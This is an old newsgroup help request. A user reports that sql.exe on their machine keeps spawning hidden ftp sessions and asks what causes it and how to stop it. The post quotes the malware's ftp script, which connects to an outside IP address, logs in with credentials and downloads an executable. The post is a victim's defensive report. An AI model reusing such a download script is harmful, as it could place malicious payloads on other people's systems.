malicious process...

From: François G. (francoisg_at_discussions.microsoft.com)
Date: 04/28/05


Date: Thu, 28 Apr 2005 03:53:34 -0700

Hi,

Since I installed a firewall on my machine, it regularly
detects unexpected ftp sessions.

Thanks to a process explorer, I remarked that ftp is
launched from a (hidden) cmd.exe, itself lauched by
sql.exe (for your info, the ftp command line is : "ftp -n -
s:???.txt" where ???.txt is a textfile in \system32\ ).

What SQL subsystem is able to launch such a process? a
stored procedure? a trigger? (fyi, SQLAgent is not
running). How can I prevent this to occur?

Thank you for your help,

François

Note - contents of the textfile :
 
open 81.244.183.229 19470
user itqavjflw itqavjflw
get SCardClnt.exe
quit



Relevant Pages

  • Re: SL7.tmp found by Zone Alarm
    ... them from running so, Process Explorer won't show them ... does zone alarm not tell you which process is calling these ... sunbelt personal firewall has ... an application launch whitelist feature which i assume is similar to ...
    (alt.comp.anti-virus)
  • Re: How can I tell which process is hogging resource
    ... The interruptions are very brief and I suspect that by the time I'd launched ... Does PE produce logs that show what happened a few minutes ago? ... Consider downloading "Process Explorer" from Microsoft's Sysinternals ... When you see the system slow down, launch Process Explorer and you ...
    (microsoft.public.windowsxp.help_and_support)
  • Process Explorer and "Jobs"
    ... if I launch from quick launch bar ... and no jom limits are there. ... Process Explorer show processes that are part of a Win32 Job in the Job ... object highlight color. ...
    (microsoft.public.windows.vista.general)
  • Re: SL7.tmp found by Zone Alarm
    ... them from running so, Process Explorer won't show them ... does zone alarm not tell you which process is calling these ... sunbelt personal firewall has ... an application launch whitelist feature which i assume is similar to ...
    (alt.comp.anti-virus)